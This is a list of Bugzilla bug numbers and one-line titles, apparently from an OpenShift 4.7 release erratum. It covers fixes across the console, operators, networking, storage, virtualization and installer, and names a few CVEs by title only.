1905380 - Default to Red Hat/KubeVirt provider if common template does not have provider annotation
1905393 - CMO uses rbac.authorization.k8s.io/v1beta1 instead of rbac.authorization.k8s.io/v1
1905404 - The example of "Remove the entrypoint on the mysql:latest image" for `oc image append` does not work
1905416 - Hyperlink not working from Operator Description
1905430 - usbguard extension fails to install because of missing correct protobuf dependency version
1905492 - The stalld service has a higher scheduler priority than ksoftirq and rcu{b, c} threads
1905502 - Test flake - unable to get https transport for ephemeral-registry
1905542 - [GSS] The "External" mode option is not available when the OCP cluster is deployed using Redhat Cluster Assisted Installer 4.6.
1905599 - Errant change to lastupdatetime in copied CSV status can trigger runaway csv syncs
1905610 - Fix typo in export script
1905621 - Protractor login test fails against a 4.7 (nightly) Power cluster
1905640 - Subscription manual approval test is flaky
1905647 - Report physical core valid-for-subscription min/max/cumulative use to telemetry
1905696 - ClusterMoreUpdatesModal component did not get internationalized
1905748 - with sharded ingresscontrollers, all shards reload when any endpoint changes
1905761 - NetworkPolicy with Egress policyType is resulting in SDN errors and improper communication within Project
1905778 - inconsistent ingresscontroller between fresh installed cluster and upgraded cluster
1905792 - [OVN]Cannot create egressfirewalll with dnsName
1905889 - Should create SA for each namespace that the operator scoped
1905920 - Quickstart exit and restart
1905941 - Page goes to error after create catalogsource
1905977 - QE ghaekin design scenaio-pipeline metrics ODC-3711
1906032 - Canary Controller: Canary daemonset rolls out slowly in large clusters
1906100 - Disconnected cluster upgrades are failing from the cli, when signature retrieval is being blackholed instead of quickly rejected
1906105 - CBO annotates an existing Metal3 deployment resource to indicate that it is managing it
1906118 - OCS feature detection constantly polls storageclusters and storageclasses
1906120 - 'Create Role Binding' form not setting user or group value when created from a user or group resource
1906121 - [oc] After new-project creation, the kubeconfig file does not set the project
1906134 - OLM should not create OperatorConditions for copied CSVs
1906143 - CBO supports log levels
1906186 - i18n: Translators are not able to translate `this` without context for alert manager config
1906228 - tuned and openshift-tuned sometimes do not terminate gracefully, slowing reboots
1906274 - StorageClass installed by Cinder csi driver operator should enable the allowVolumeExpansion to support volume resize.
1906276 - `oc image append` can't work with multi-arch image with --filter-by-os='.*'
1906318 - use proper term for Authorized SSH Keys
1906335 - The lastTransitionTime, message, reason field of operatorcondition should be optional
1906356 - Unify Clone PVC boot source flow with URL/Container boot source
1906397 - IPA has incorrect kernel command line arguments
1906441 - HorizontalNav and NavBar have invalid keys
1906448 - Deploy using virtualmedia with provisioning network disabled fails - 'Failed to connect to the agent' in ironic-conductor log
1906459 - openstack: Quota Validation fails if unlimited quotas are given to a project
1906496 - [BUG] Thanos having possible memory leak consuming huge amounts of node's memory and killing them
1906508 - TestHeaderNameCaseAdjust outputs nil error message on some failures
1906511 - Root reprovisioning tests flaking often in CI
1906517 - Validation is not robust enough and may prevent to generate install-confing.
1906518 - Update snapshot API CRDs to v1
1906519 - Update LSO CRDs to use v1
1906570 - Number of disruptions caused by reboots on a cluster cannot be measured
1906588 - [ci][sig-builds] nodes is forbidden: User "e2e-test-jenkins-pipeline-xfghs-user" cannot list resource "nodes" in API group "" at the cluster scope
1906650 - Cannot collect network policy, EgressFirewall, egressip logs with gather_network_logs
1906655 - [SDN]Cannot colloect ovsdb-server.log and ovs-vswitchd.log with gather_network_logs
1906679 - quick start panel styles are not loaded
1906683 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber
1906684 - Event Source creation fails if user selects no app group and switch to yaml and then to form
1906685 - SinkBinding is shown in topology view if underlying resource along with actual source created
1906689 - user can pin to nav configmaps and secrets multiple times
1906691 - Add doc which describes disabling helm chart repository
1906713 - Quick starts not accesible for a developer user
1906718 - helm chart "provided by Redhat" is misspelled
1906732 - Machine API proxy support should be tested
1906745 - Update Helm endpoints to use Helm 3.4.x
1906760 - performance issues with topology constantly re-rendering
1906766 - localized `Autoscaled` & `Autoscaling` pod texts overlap with the pod ring
1906768 - Virtualization nav item is incorrectly placed in the Admin Workloads section
1906769 - topology fails to load with non-kubeadmin user
1906770 - shortcuts on mobiles view occupies a lot of space
1906798 - Dev catalog customization doesn't update console-config ConfigMap
1906806 - Allow installing extra packages in ironic container images
1906808 - [test-disabled] ServiceAccounts should support OIDC discovery of service account issuer
1906835 - Topology view shows add page before then showing full project workloads
1906840 - ClusterOperator should not have status "Updating" if operator version is the same as the release version
1906844 - EndpointSlice and EndpointSliceProxying feature gates should be disabled for openshift-sdn kube-proxy
1906860 - Bump kube dependencies to v1.20 for Net Edge components
1906864 - Quick Starts Tour: Need to adjust vertical spacing
1906866 - Translations of Sample-Utils
1906871 - White screen when sort by name in monitoring alerts page
1906872 - Pipeline Tech Preview Badge Alignment
1906875 - Provide an option to force backup even when API is not available.
1906877 - Placeholder' value in search filter do not match column heading in Vulnerabilities
1906879 - Add missing i18n keys
1906880 - oidcdiscoveryendpoint controller invalidates all TokenRequest API tokens during install
1906896 - No Alerts causes odd empty Table (Need no content message)
1906898 - Missing User RoleBindings in the Project Access Web UI
1906899 - Quick Start - Highlight Bounding Box Issue
1906916 - Teach CVO about flowcontrol.apiserver.k8s.io/v1beta1
1906933 - Cluster Autoscaler should have improved mechanisms for group identifiers
1906935 - Delete resources when Provisioning CR is deleted
1906968 - Must-gather should support collecting kubernetes-nmstate resources
1906986 - Ensure failed pod adds are retried even if the pod object doesn't change
1907199 - Need to upgrade machine-api-operator module version under cluster-api-provider-kubevirt
1907202 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change
1907211 - beta promotion of p&f switched storage version to v1beta1, making downgrades impossible.
1907269 - Tooltips data are different when checking stack or not checking stack for the same time
1907280 - Install tour of OCS not available.
1907282 - Topology page breaks with white screen
1907286 - The default mhc machine-api-termination-handler couldn't watch spot instance
1907287 - [csi-snapshot-webhook] should support both v1beta1 and v1 version when creating volumesnapshot/volumesnapshotcontent
1907293 - Increase timeouts in e2e tests
1907295 - Gherkin script for improve management for helm
1907299 - Advanced Subscription Badge for KMS and Arbiter not present
1907303 - Align VM template list items by baseline
1907304 - Use PF styles for selected template card in VM Wizard
1907305 - Drop 'ISO' from CDROM boot source message
1907307 - Support and provider labels should be passed on between templates and sources
1907310 - Pin action should be renamed to favorite
1907312 - VM Template source popover is missing info about added date
1907313 - ClusterOperator objects cannot be overriden with cvo-overrides
1907328 - iproute-tc package is missing in ovn-kube image
1907329 - CLUSTER_PROFILE env. variable is not used by the CVO
1907333 - Node stuck in degraded state, mcp reports "Failed to remove rollback: error running rpm-ostree cleanup -r: error: Timeout was reached"
1907373 - Rebase to kube 1.20.0
1907375 - Bump to latest available 1.20.x k8s - workloads team
1907378 - Gather netnamespaces networking info
1907380 - kube-rbac-proxy exposes tokens, has excessive verbosity
1907381 - OLM fails to deploy an operator if its deployment template contains a description annotation that doesn't match the CSV one
1907390 - prometheus-adapter: panic after k8s 1.20 bump
1907399 - build log icon link on topology nodes cause app to reload
1907407 - Buildah version not accessible
1907421 - [4.6.1]oc-image-mirror command failed on "error: unable to copy layer"
1907453 - Dev Perspective -> running vm details -> resources -> no data
1907454 - Install PodConnectivityCheck CRD with CNO
1907459 - "The Boot source is also maintained by Red Hat." is always shown for all boot sources
1907475 - Unable to estimate the error rate of ingress across the connected fleet
1907480 - `Active alerts` section throwing forbidden error for users.
1907518 - Kamelets/Eventsource should be shown to user if they have create access
1907543 - Korean timestamps are shown when users' language preferences are set to German-en-en-US
1907610 - Update kubernetes deps to 1.20
1907612 - Update kubernetes deps to 1.20
1907621 - openshift/installer: bump cluster-api-provider-kubevirt version
1907628 - Installer does not set primary subnet consistently
1907632 - Operator Registry should update its kubernetes dependencies to 1.20
1907639 - pass dual-stack node IPs to kubelet in dual-stack clusters
1907644 - fix up handling of non-critical annotations on daemonsets/deployments
1907660 - Pod list does not render cell height correctly when pod names are too long (dynamic table rerendering issue?)
1907670 - CVE-2020-27846 crewjam/saml: authentication bypass in saml authentication
1907671 - Ingress VIP assigned to two infra nodes simultaneously - keepalived process running in pods seems to fail
1907767 - [e2e][automation]update test suite for kubevirt plugin
1907770 - Recent RHCOS 47.83 builds (from rhcos-47.83.202012072210-0 on) don't allow master and worker nodes to boot
1907792 - The `overrides` of the OperatorCondition cannot block the operator upgrade
1907793 - Surface support info in VM template details
1907812 - 4.7 to 4.6 downgrade stuck in clusteroperator storage
1907822 - [OCP on OSP] openshift-install panic when checking quota with install-config have no flavor set
1907863 - Quickstarts status not updating when starting the tour
1907872 - dual stack with an ipv6 network fails on bootstrap phase
1907874 - QE - Design Gherkin Scenarios for epic ODC-5057
1907875 - No response when try to expand pvc with an invalid size
1907876 - Refactoring record package to make gatherer configurable
1907877 - QE - Automation- pipelines builder scripts
1907883 - Fix Pipleine creation without namespace issue
1907888 - Fix pipeline list page loader
1907890 - Misleading and incomplete alert message shown in pipeline-parameters and pipeline-resources form
1907892 - Unable to edit application deployed using "From Devfile" option
1907893 - navSortUtils.spec.ts unit test failure
1907896 - When a workload is added, Topology does not place the new items well
1907908 - VM Wizard always uses VirtIO for the VM rootdisk regardless what is defined in common-template
1907924 - Enable madvdontneed in OpenShift Images
1907929 - Enable madvdontneed in OpenShift System Components Part 2
1907936 - NTO is not reporting nto_profile_set_total metrics correctly after reboot
1907947 - The kubeconfig saved in tenantcluster shouldn't include anything that is not related to the current context
1907948 - OCM-O bump to k8s 1.20
1907952 - bump to k8s 1.20
1907972 - Update OCM link to open Insights tab
1907989 - DataVolumes was intorduced in common templates - VM creation fails in the UI
1907998 - Gather kube_pod_resource_request/limit metrics as exposed in upstream KEP 1916
1908001 - [CVE-2020-10749] Update github.com/containernetworking/plugins to v.0.8.6 in egress-router-cni
1908014 - e2e-aws-ansible and e2e-aws-helm are broken in ocp-release-operator-sdk
1908035 - dynamic-demo-plugin build does not generate dist directory
1908135 - quick search modal is not centered over topology
1908145 - kube-scheduler-recovery-controller container crash loop when router pod is co-scheduled
1908159 - [AWS C2S] MCO fails to sync cloud config
1908171 - GCP: Installation fails when installing cluster with n1-custom-4-16384custom type (n1-custom-4-16384)
1908180 - Add source for template is stucking in preparing pvc
1908217 - CI: Server-Side Apply should work for oauth.openshift.io/v1: has no tokens
1908231 - [Migration] The pods ovnkube-node are in CrashLoopBackOff after SDN to OVN
1908277 - QE - Automation- pipelines actions scripts
1908280 - Documentation describing `ignore-volume-az` is incorrect
1908296 - Fix pipeline builder form yaml switcher validation issue
1908303 - [CVE-2020-28367 CVE-2020-28366] Remove CGO flag from rhel Dockerfile in Egress-Router-CNI
1908323 - Create button missing for PLR in the search page
1908342 - The new pv_collector_total_pv_count is not reported via telemetry
1908344 - [vsphere-problem-detector] CheckNodeProviderID and CheckNodeDiskUUID have the same name
1908347 - CVO overwrites ValidatingWebhookConfiguration for snapshots
1908349 - Volume snapshot tests are failing after 1.20 rebase
1908353 - QE - Automation- pipelines runs scripts
1908361 - bump to k8s 1.20
1908367 - QE - Automation- pipelines triggers scripts
1908370 - QE - Automation- pipelines secrets scripts
1908375 - QE - Automation- pipelines workspaces scripts
1908381 - Go Dependency Fixes for Devfile Lib
1908389 - Loadbalancer Sync failing on Azure
1908400 - Tests-e2e, increase timeouts, re-add TestArchiveUploadedAndResultsReceived
1908407 - Backport Upstream 95269 to fix potential crash in kubelet
1908410 - Exclude Yarn from VSCode search
1908425 - Create Role Binding form subject type and name are undefined when All Project is selected
1908431 - When the marketplace-operator pod get's restarted, the custom catalogsources are gone, as well as the pods
1908434 - Remove &apos from metal3-plugin internationalized strings
1908437 - Operator backed with no icon has no badge associated with the CSV tag
1908459 - bump to k8s 1.20
1908461 - Add bugzilla component to OWNERS file
1908462 - RHCOS 4.6 ostree removed dhclient
1908466 - CAPO AZ Screening/Validating
1908467 - Zoom in and zoom out in topology package should be sentence case
1908468 - [Azure][4.7] Installer can't properly parse instance type with non integer memory size
1908469 - nbdb failed to come up while bringing up OVNKubernetes cluster
1908471 - OLM should bump k8s dependencies to 1.20
1908484 - oc adm release extract --cloud=aws --credentials-requests dumps all manifests
1908493 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM
1908545 - VM clone dialog does not open
1908557 - [e2e][automation]Miss css id on bootsource and reviewcreate step on wizard
1908562 - Pod readiness is not being observed in real world cases
1908565 - [4.6] Cannot filter the platform/arch of the index image
1908573 - Align the style of flavor
1908583 - bootstrap does not run on additional networks if configured for master in install-config
1908596 - Race condition on operator installation
1908598 - Persistent Dashboard shows events for all provisioners
1908641 - Go back to Catalog Page link on Virtual Machine page vanishes on empty state
1908648 - Skip TestKernelType test on OKD, adjust TestExtensions
1908650 - The title of customize wizard is inconsistent
1908654 - cluster-api-provider: volumes and disks names shouldn't change by machine-api-operator
1908675 - Reenable [sig-storage] CSI mock volume CSI FSGroupPolicy [LinuxOnly] should modify fsGroup if fsGroupPolicy=default [Suite:openshift/conformance/parallel] [Suite:k8s]
1908687 - Option to save user settings separate when using local bridge (affects console developers only)
1908697 - Show `kubectl diff ` command in the oc diff help page
1908715 - Pressing the arrow up key when on topmost quick-search list item it should loop back to bottom
1908716 - UI breaks on click of sidebar of ksvc (if revisions not up) in topology on 4.7 builds
1908717 - "missing unit character in duration" error in some network dashboards
1908746 - [Safari] Drop Shadow doesn't works as expected on hover on workload
1908747 - stale S3 CredentialsRequest in CCO manifest
1908758 - AWS: NLB timeout value is rejected by AWS cloud provider after 1.20 rebase
1908830 - RHCOS 4.6 - Missing Initiatorname
1908868 - Update empty state message for EventSources and Channels tab
1908880 - 4.7 aws-serial CI: NoExecuteTaintManager Single Pod [Serial] eventually evict pod with finite tolerations from tainted nodes
1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference
1908888 - Dualstack does not work with multiple gateways
1908889 - Bump CNO to k8s 1.20
1908891 - TestDNSForwarding DNS operator e2e test is failing frequently
1908914 - CNO: upgrade nodes before masters
1908918 - Pipeline builder yaml view sidebar is not responsive
1908960 - QE - Design Gherkin Scenarios
1908971 - Gherkin Script for pipeline debt 4.7
1908983 - i18n: Add Horizontal Pod Autoscaler action menu is not translated
1908997 - Unsupported access mode should not be available when creating pvc by cinder-csi-driver/gcp-pd-csi-driver from web-console
1908998 - [cinder-csi-driver] doesn't detect the credentials change
1909004 - "No datapoints found" for RHEL node's filesystem graph
1909005 - i18n: workloads list view heading is not translated
1909012 - csi snapshot webhook does not block any invalid update for volumesnapshot and volumesnapshotcontent objects
1909027 - Disks option of Sectected capacity chart shows HDD disk even on selection of SDD disk type
1909043 - OCP + OCS 4.7 Internal - Storage cluster creation throws warning when zone=0 in VMware
1909067 - Web terminal should keep latest output when connection closes
1909070 - PLR and TR Logs component is not streaming as fast as tkn
1909092 - Error Message should not confuse user on Channel form
1909096 - OCP 4.7+OCS 4.7 - The Requested Cluster Capacity field needs to include the selected capacity in calculation in Review and Create Page
1909108 - Machine API components should use 1.20 dependencies
1909116 - Catalog Sort Items dropdown is not aligned on Firefox
1909198 - Move Sink action option is not working
1909207 - Accessibility Issue on monitoring page
1909236 - Remove pinned icon overlap on resource name
1909249 - Intermittent packet drop from pod to pod
1909276 - Accessibility Issue on create project modal
1909289 - oc debug of an init container no longer works
1909290 - Logging may be broken due to mix of k8s.io/klog v1 and v2
1909358 - registry.redhat.io/redhat/community-operator-index:latest only have hyperfoil-bundle
1909453 - Boot disk RAID can corrupt ESP if UEFI firmware writes to it
1909455 - Boot disk RAID will not boot if the primary disk enumerates but fails I/O
1909464 - Build operator-registry with golang-1.15
1909502 - NO_PROXY is not matched between bootstrap and global cluster setting which lead to desired master machineconfig is not found
1909521 - Add kubevirt cluster type for e2e-test workflow
1909527 - [IPI Baremetal] After upgrade from 4.6 to 4.7 metal3 pod does not get created
1909587 - [OCP4] all of the OCP master nodes with soft-anti-affinity run on the same OSP node
1909610 - Fix available capacity when no storage class selected
1909678 - scale up / down buttons available on pod details side panel
1909723 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART
1909730 - unbound variable error if EXTRA_PKGS_LIST is not defined
1909739 - Arbiter request data changes
1909744 - cluster-api-provider-openstack: Bump gophercloud
1909790 - PipelineBuilder yaml view cannot be used for editing a pipeline
1909791 - Update standalone kube-proxy config for EndpointSlice
1909792 - Empty states for some details page subcomponents are not i18ned
1909815 - Perspective switcher is only half-i18ned
1909821 - OCS 4.7 LSO installation blocked because of Error "Invalid value: "integer": spec.flexibleScaling in body
1909836 - operator-install-global Cypress test was failing in OLM as it depends on an operator that isn't installed in CI
1909864 - promote-release-openshift-machine-os-content-e2e-aws-4.5 is perm failing
1909911 - [OVN]EgressFirewall caused a segfault
1909943 - Upgrade from 4.6 to 4.7 stuck due to write /sys/devices/xxxx/block/sda/queue/scheduler: invalid argument
1909958 - Support Quick Start Highlights Properly
1909978 - ignore-volume-az = yes not working on standard storageClass
1909981 - Improve statement in template select step
1909992 - Fail to pull the bundle image when using the private index image
1910024 - Reload issue in latest(4.7) UI code on 4.6 cluster locally in dev
1910036 - QE - Design Gherkin Scenarios ODC-4504
1910049 - UPI: ansible-galaxy is not supported
1910127 - [UPI on oVirt]: Improve UPI Documentation
1910140 - fix the api dashboard with changes in upstream kube 1.20
1910160 - If two OperatorConditions include the same deployments they will keep updating the deployment's containers with the OPERATOR_CONDITION_NAME Environment Variable
1910165 - DHCP to static lease script doesn't handle multiple addresses
1910305 - [Descheduler] - The minKubeVersion should be 1.20.0
1910409 - Notification drawer is not localized for i18n
1910459 - Could not provision gcp volume if delete secret gcp-pd-cloud-credentials
1910492 - KMS details are auto-populated on the screen in next attempt at Storage cluster creation
1910501 - Installed Operators->Operand required: Clicking on cancel in Storage cluster page takes back to the Install Operator page
1910533 - [OVN] It takes about 5 minutes for EgressIP failover to work
1910581 - library-go: proxy ENV is not injected into csi-driver-controller which lead to storage operator never get ready
1910666 - Creating a Source Secret from type SSH-Key should use monospace font for better usability
1910738 - OCP 4.7 Installation fails on VMWare due to 1 worker that is degraded
1910739 - Redfish-virtualmedia (idrac) deploy fails on "The Virtual Media image server is already connected"
1910753 - Support Directory Path to Devfile
1910805 - Missing translation for Pipeline status and breadcrumb text
1910829 - Cannot delete a PVC if the dv's phase is WaitForFirstConsumer
1910840 - Show Nonexistent command info in the `oc rollback -h` help page
1910859 - breadcrumbs doesn't use last namespace
1910866 - Unify templates string
1910870 - Unify template dropdown action
1911016 - Prometheus unable to mount NFS volumes after upgrading to 4.6
1911129 - Monitoring charts renders nothing when switching from a Deployment to "All workloads"
1911176 - [MSTR-998] Wrong text shown when hovering on lines of charts in API Performance dashboard
1911212 - [MSTR-998] API Performance Dashboard "Period" drop-down has a choice "$__auto_interval_period" which can bring "1:154: parse error: missing unit character in duration"
1911213 - Wrong and misleading warning for VMs that were created manually (not from template)
1911257 - [aws-c2s] failed to create cluster, kube-cloud-config was not created
1911269 - waiting for the build message present when build exists
1911280 - Builder images are not detected for Dotnet, Httpd, NGINX
1911307 - Pod Scale-up requires extra privileges in OpenShift web-console
1911381 - "Select Persistent Volume Claim project" shows in customize wizard when select a source available template
1911382 - "source volumeMode (Block) and target volumeMode (Filesystem) do not match" shows in VM Error
1911387 - Hit error - "Cannot read property 'value' of undefined" while creating VM from template
1911408 - [e2e][automation] Add auto-clone cli tests and new flow of VM creation
1911418 - [v2v] The target storage class name is not displayed if default storage class is used
1911434 - git ops empty state page displays icon with watermark
1911443 - SSH Cretifiaction field should be validated
1911465 - IOPS display wrong unit
1911474 - Devfile Application Group Does Not Delete Cleanly (errors)
1911487 - Pruning Deployments should use ReplicaSets instead of ReplicationController
1911574 - Expose volume mode on Upload Data form
1911617 - [CNV][UI] Failure to add source to VM template when no default storage class is defined
1911632 - rpm-ostree command fail due to wrong options when updating ocp-4.6 to 4.7 on worker nodes with rt-kernel
1911656 - using 'operator-sdk run bundle' to install operator successfully, but the command output said 'Failed to run bundle''
1911664 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state
1911782 - Descheduler should not evict pod used local storage by the PVC
1911796 - uploading flow being displayed before submitting the form
1912066 - The ansible type operator's manager container is not stable when managing the CR
1912077 - helm operator's default rbac forbidden
1912115 - [automation] Analyze job keep failing because of 'JavaScript heap out of memory'
1912237 - Rebase CSI sidecars for 4.7
1912381 - [e2e][automation] Miss css ID on Create Network Attachment Definition page
1912409 - Fix flow schema deployment
1912434 - Update guided tour modal title
1912522 - DNS Operator e2e test: TestCoreDNSImageUpgrade is fundamentally broken
1912523 - Standalone pod status not updating in topology graph
1912536 - Console Plugin CR for console-demo-plugin has wrong apiVersion
1912558 - TaskRun list and detail screen doesn't show Pending status
1912563 - p&f: carry 97206: clean up executing request on panic
1912565 - OLM macOS local build broken by moby/term dependency
1912567 - [OCP on RHV] Node becomes to 'NotReady' status when shutdown vm from RHV UI only on the second deletion
1912577 - 4.1/4.2->4.3->...-> 4.7 upgrade is stuck during 4.6->4.7 with co/openshift-apiserver Degraded, co/network not Available and several other components pods CrashLoopBackOff
1912590 - publicImageRepository not being populated
1912640 - Go operator's controller pods is forbidden
1912701 - Handle dual-stack configuration for NIC IP
1912703 - multiple queries can't be plotted in the same graph under some conditons
1912730 - Operator backed: In-context should support visual connector if SBO is not installed
1912828 - Align High Performance VMs with High Performance in RHV-UI
1912849 - VM from wizard - default flavor does not match the actual flavor set by common templates
1912852 - VM from wizard - available VM templates - "storage" field is "0 B"
1912888 - recycler template should be moved to KCM operator
1912907 - Helm chart repository index can contain unresolvable relative URL's
1912916 - Set external traffic policy to cluster for IBM platform
1912922 - Explicitly specifying the operator generated default certificate for an ingress controller breaks the ingress controller
1912938 - Update confirmation modal for quick starts
1912942 - cluster-storage-operator: proxy ENV is not injected into vsphere-problem-detector deployment
1912944 - cluster-storage-operator: proxy ENV is not injected into Manila CSI driver operator deployment
1912945 - aws-ebs-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912946 - gcp-pd-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912947 - openstack-cinder-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912948 - csi-driver-manila-operator: proxy ENV is not injected into the CSI driver
1912949 - ovirt-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912977 - rebase upstream static-provisioner
1913006 - Remove etcd v2 specific alerts with etcd_http* metrics
1913011 - [OVN] Pod's external traffic not use egressrouter macvlan ip as a source ip
1913037 - update static-provisioner base image
1913047 - baremetal clusteroperator progressing status toggles between true and false when cluster is in a steady state
1913085 - Regression OLM uses scoped client for CRD installation
1913096 - backport: cadvisor machine metrics are missing in k8s 1.19
1913132 - The installation of Openshift Virtualization reports success early before it 's succeeded eventually
1913154 - Upgrading to 4.6.10 nightly failed with RHEL worker nodes: Failed to find /dev/disk/by-label/root
1913196 - Guided Tour doesn't handle resizing of browser
1913209 - Support modal should be shown for community supported templates
1913226 - [Migration] The SDN migration rollback failed if customize vxlanPort
1913249 - update info alert this template is not aditable
1913285 - VM list empty state should link to virtualization quick starts
1913289 - Rebase AWS EBS CSI driver for 4.7
1913292 - OCS 4.7 Installation failed over vmware when arbiter was enabled, as flexibleScaling is also getting enabled
1913297 - Remove restriction of taints for arbiter node
1913306 - unnecessary scroll bar is present on quick starts panel
1913325 - 1.20 rebase for openshift-apiserver
1913331 - Import from git: Fails to detect Java builder
1913332 - Pipeline visualization breaks the UI when multiple taskspecs are used
1913343 - (release-4.7) Added changelog file for insights-operator
1913356 - (release-4.7) Implemented gathering specific logs from openshift apiserver operator
1913371 - Missing i18n key "Administrator" in namespace "console-app" and language "en."
1913386 - users can see metrics of namespaces for which they don't have rights when monitoring own services with prometheus user workloads
1913420 - Time duration setting of resources is not being displayed
1913536 - 4.6.9 -> 4.7 upgrade hangs. RHEL 7.9 worker stuck on "error enabling unit: Failed to execute operation: File exists\\n\"
1913554 - Recording rule for ingress error fraction SLI is incorrect, uses irate instead of increase
1913560 - Normal user cannot load template on the new wizard
1913563 - "Virtual Machine" is not on the same line in create button when logged with normal user
1913567 - Tooltip data should be same for line chart or stacked chart, display data value same as the table
1913568 - Normal user cannot create template
1913582 - [Migration]SDN to OVN migration stucks on MCO for rhel worker
1913585 - Topology descriptive text fixes
1913608 - Table data contains data value None after change time range in graph and change back
1913651 - Improved Red Hat image and crashlooping OpenShift pod collection
1913660 - Change location and text of Pipeline edit flow alert
1913685 - OS field not disabled when creating a VM from a template
1913716 - Include additional use of existing libraries
1913725 - Refactor Insights Operator Plugin states
1913736 - Regression: fails to deploy computes when using root volumes
1913747 - Update operator to kubernetes 1.20.1 to pickup upstream fixes
1913751 - add third-party network plugin test suite to openshift-tests
1913783 - QE-To fix the merging pr issue, commenting the afterEach() block
1913807 - Template support badge should not be shown for community supported templates
1913821 - Need definitive steps about uninstalling descheduler operator
1913851 - Cluster Tasks are not sorted in pipeline builder
1913864 - BuildConfig YAML template references ruby ImageStreamTag that no longer exists
1913951 - Update the Devfile Sample Repo to an Official Repo Host
1913960 - Cluster Autoscaler should use 1.20 dependencies
1913969 - Field dependency descriptor can sometimes cause an exception
1914060 - Disk created from 'Import via Registry' cannot be used as boot disk
1914066 - [sriov] sriov dp pod crash when delete ovs HW offload policy
1914090 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks)
1914119 - vsphere problem detector operator has no permission to update storages.operator.openshift.io instances
1914125 - Still using /dev/vde as default device path when create localvolume
1914183 - Empty NAD page is missing link to quickstarts
1914196 - target port in `from dockerfile` flow does nothing
1914204 - Creating VM from dev perspective may fail with template not found error
1914209 - Associate image secret name to pipeline serviceaccount imagePullSecrets
1914212 - [e2e][automation] Add test to validate bootable disk souce
1914250 - ovnkube-node fails on master nodes when both DHCPv6 and SLAAC addresses are configured on nodes
1914284 - Upgrade to OCP 4.6.9 results in cluster-wide DNS and connectivity issues due to bad NetworkPolicy flows
1914287 - Bring back selfLink
1914301 - User VM Template source should show the same provider as template itself
1914303 - linuxptp-daemon is not forwarding ptp4l stderr output to openshift logs
1914309 - /terminal page when WTO not installed shows nonsensical error
1914334 - order of getting started samples is arbitrary
1914343 - [sig-imageregistry][Feature:ImageTriggers] Annotation trigger reconciles after the image is overwritten [Suite:openshift/conformance/parallel] timeout on s390x
1914349 - Increase and decrease buttons in max and min pods in HPA page has distorted UI
1914405 - Quick search modal should be opened when coming back from a selection
1914407 - Its not clear that node-ca is running as non-root
1914427 - Count of pods on the dashboard is incorrect
1914439 - Typo in SRIOV port create command example
1914451 - cluster-storage-operator pod running as root
1914452 - oc image append, oc image extract outputs wrong suggestion to use --keep-manifest-list=true
1914642 - Customize Wizard Storage tab does not pass validation
1914723 - SamplesTBRInaccessibleOnBoot Alert has a misspelling
1914793 - device names should not be translated
1914894 - Warn about using non-groupified api version
1914926 - webdriver-manager pulls incorrect version of ChomeDriver due to a bug
1914932 - Put correct resource name in relatedObjects
1914938 - PVC disk is not shown on customization wizard general tab
1914941 - VM Template rootdisk is not deleted after fetching default disk bus
1914975 - Collect logs from openshift-sdn namespace
1915003 - No estimate of average node readiness during lifetime of a cluster
1915027 - fix MCS blocking iptables rules
1915041 - s3:ListMultipartUploadParts is relied on implicitly
1915079 - Canary controller should not periodically rotate the canary route endpoint for performance reasons
1915080 - Large number of tcp connections with shiftstack ocp cluster in about 24 hours
1915085 - Pods created and rapidly terminated get stuck
1915114 - [aws-c2s] worker machines are not create during install
1915133 - Missing default pinned nav items in dev perspective
1915176 - Update snapshot API CRDs to v1 in web-console when creating volumesnapshot related resource
1915187 - Remove the "Tech preview" tag in web-console for volumesnapshot
1915188 - Remove HostSubnet anonymization
1915200 - [OCP 4.7+ OCS 4.6]Arbiter related Note should not show up during UI deployment
1915217 - OKD payloads expect to be signed with production keys
1915220 - Remove dropdown workaround for user settings
1915235 - Failed to upgrade to 4.7 from 4.6 due to the machine-config failure
1915262 - When deploying with assisted install the CBO operator is installed and enabled without metal3 pod
1915277 - [e2e][automation]fix cdi upload form test
1915295 - [BM][IP][Dualstack] Installation failed - operators report dial tcp 172.30.0.1:443: i/o timeout
1915304 - Updating scheduling component builder & base images to be consistent with ART
1915312 - Prevent schedule Linux openshift-network-diagnostics pod on Windows node
1915318 - [Metal] bareMetal IPI - cannot interact with toolbox container after first execution only in parallel from different connection
1915348 - [RFE] linuxptp operator needs to expose the uds_address_socket to be used by an application pod
1915357 - Dev Catalog doesn't load anything if virtualization operator is installed
1915379 - New template wizard should require provider and make support input a dropdown type
1915408 - Failure in operator-registry kind e2e test
1915416 - [Descheduler] descheduler evicts pod which does not have any ownerRef or descheduler evict annotation
1915460 - Cluster name size might affect installations
1915500 - [aws c2s] kube-controller-manager crash loops trying to fetch the AWS instance
1915540 - Silent 4.7 RHCOS install failure on ppc64le
1915579 - [Metal] redhat-support-tool became unavailable after tcpdump usage (BareMetal IPI)
1915582 - p&f: carry upstream pr 97860
1915594 - [e2e][automation] Improve test for disk validation
1915617 - Bump bootimage for various fixes
1915624 - "Please fill in the following field: Template provider" blocks customize wizard
1915627 - Translate Guided Tour text.
1915643 - OCP4.6 to 4.7 upgrade failed due to manila csi driver operator sync error
1915647 - Intermittent White screen when the connector dragged to revision
1915649 - "Template support" pop up is not a warning; checkbox text should be rephrased
1915654 - [e2e][automation] Add a verification for Afinity modal should hint "Matching node found"
1915661 - Can't run the 'oc adm prune' command in a pod
1915672 - Kuryr doesn't work with selfLink disabled.
1915674 - Golden image PVC creation - storage size should be taken from the template
1915685 - Message for not supported template is not clear enough
1915760 - Need to increase timeout to wait rhel worker get ready
1915793 - quick starts panel syncs incorrectly across browser windows
1915798 - oauth connection errors for openshift console pods on an OVNKube OCP 4.7 cluster
1915818 - vsphere-problem-detector: use "_totals" in metrics
1915828 - Latest Dell firmware (04.40.00.00) fails to install IPI on BM using idrac-virtualmedia protocol
1915859 - vsphere-problem-detector: does not report ESXi host version nor VM HW version
1915871 - operator-sdk version in new downstream image should be v1.2.0-ocp not v4.7.0
